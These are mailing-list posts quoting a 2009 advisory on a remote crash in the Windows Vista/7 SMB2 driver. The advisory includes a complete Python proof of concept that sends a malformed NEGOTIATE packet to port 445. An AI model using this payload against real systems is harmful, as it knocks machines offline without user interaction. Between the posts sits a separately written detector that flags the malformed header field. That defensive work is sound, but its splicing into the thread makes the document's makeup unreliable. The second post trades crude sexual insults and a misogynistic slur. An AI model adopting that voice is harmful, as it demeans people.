Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
How come all I hear about is n3td3v, and I see no one crying out loud about this:
http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15

is fd all 'bout trolls nao?

--

Release date: September 7th, 2009
Discovered by: Laurent Gaffié
Severity: Medium/High

I. VULNERABILITY

Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND

Windows Vista and newer Windows versions come with a new SMB version named SMB2. See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it's used to identify the SMB dialect that will be used for further communication.

IV. PROOF OF CONCEPT

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a char in the Process Id High SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep

host = "IP_ADDR", 445

buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)

s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT

An attacker can remotely crash, without any user interaction, any Vista/Windows 7 machine with SMB enabled. Windows XP, 2k are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED

Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server 2008 as it uses the same SMB2.0 driver (not tested).

VII. SOLUTION

Vendor contacted, but no patch available for the moment. Close the SMB feature and ports until a patch is provided.

VIII. REFERENCES

http://microsoft.com

IX. CREDITS

This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
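The header field the advisory's PoC tampers with can be checked on the wire at a sensor or proxy. The following is an added example, not code from the advisory or from either poster: it parses a NetBIOS-framed SMB1 NEGOTIATE request, flags a non-zero Process ID High field, and notes whether the client also offered the SMB 2.002 dialect. The build_negotiate helper and the sample packets it produces are constructed here; its header constants are taken from the PoC's bytes.

```python
import struct
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB2_DIALECT = b"SMB 2.002"
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
            b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", SMB2_DIALECT]
def parse_smb1(data):
    """NetBIOS session message -> SMB1 header fields and body; None if not SMB1."""
    if len(data) < 36 or data[0] != 0x00:
        return None
    if int.from_bytes(data[1:4], "big") != len(data) - 4:  # NetBIOS length must match
        return None
    smb = data[4:]
    if smb[:4] != SMB_MAGIC:
        return None
    # 32-byte little-endian header: magic(4) cmd(1) status(4) flags(1) flags2(2)
    # pid_high(2) signature(8) reserved(2) tid(2) pid(2) uid(2) mid(2)
    cmd, _status, _flags, flags2, pid_high = struct.unpack_from("<BIBHH", smb, 4)
    tid, pid, uid, mid = struct.unpack_from("<HHHH", smb, 24)
    return {"command": cmd, "flags2": flags2, "pid_high": pid_high,
            "tid": tid, "pid": pid, "uid": uid, "mid": mid, "body": smb[32:]}

def negotiate_dialects(body):
    """NEGOTIATE body: WordCount, ByteCount, then 0x02-prefixed NUL-terminated dialects."""
    if len(body) < 3:
        return []
    wct, bcc = body[0], struct.unpack_from("<H", body, 1)[0]
    blob = body[3 + 2 * wct:3 + 2 * wct + bcc]
    return [d[1:] for d in blob.split(b"\x00") if d.startswith(b"\x02")]

def inspect_negotiate(data):
    """Findings for an SMB1 NEGOTIATE request; an empty list means nothing odd."""
    hdr = parse_smb1(data)
    if hdr is None or hdr["command"] != SMB_COM_NEGOTIATE:
        return []
    findings = []
    if hdr["pid_high"] != 0:  # the field the advisory's PoC sets to a non-zero value
        note = "ProcessIdHigh=0x%04x in NEGOTIATE, expected 0x0000" % hdr["pid_high"]
        if SMB2_DIALECT in negotiate_dialects(hdr["body"]):
            note += " (client also offers SMB 2.002)"
        findings.append(note)
    return findings
def build_negotiate(pid_high, dialects=DIALECTS):
    """Constructed sample request; header constants follow the advisory's PoC bytes."""
    blob = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    body = b"\x00" + struct.pack("<H", len(blob)) + blob   # WordCount=0, ByteCount, dialects
    hdr = SMB_MAGIC + struct.pack("<BIBHH", SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, pid_high)
    hdr += b"\x00" * 10 + struct.pack("<HHHH", 0xFFFF, 0xFEFF, 0, 0)  # sig, reserved, tid..mid
    return b"\x00" + (len(hdr) + len(body)).to_bytes(3, "big") + hdr + body
```

A request built with pid_high=0 produces no findings; one built with the PoC's 0x2600 value is flagged, and the same check can be pointed at any captured 445/tcp session payload.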
Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.
Hey, buddy, you know spam filters sometimes can be stupid. Don't implement a stupid filter in your head. Just because I mention a troll in my email, have a hushmail address, and post a link you assume I must be rickrolling you or something?

I was really surprised when I heard that Gaffie's remote DoS could in fact be remote code exec. Not a mention here, unless I missed something. That's the link I posted, and since I don't understand shit to asm, I was expecting some feedback.

BTW, this is not a flame, but since you assumed I was trolling, I just wanted to make clear I was providing info, and waiting for feedback on it.

PS : I use hush as disposable addresses, and it's none of your business. And I don't mind my sister sleeping around, she's just a whore anyway.

--

Does anybody care? In fact does anybody who contributes anything useful to this list use Hushmail? (at this time I am too lazy to look). If not I can set my spam filter. Amusing as it has been, it has grown tiresome.

btw mr lawyer/mr random guy etc. my dick is bigger than yours, at least that's what your wife and sister tell me ;-)

I am a noob with skills marginally better (debatable) than the average spotty first line support analyst. Therefore constructive criticism is welcomed, anything else is ignored unless I am bored or stupid enough to read/respond to these postings after a bottle of Shiraz.

regards
the learner aka MrX

ps I wish I didn't have so much to learn.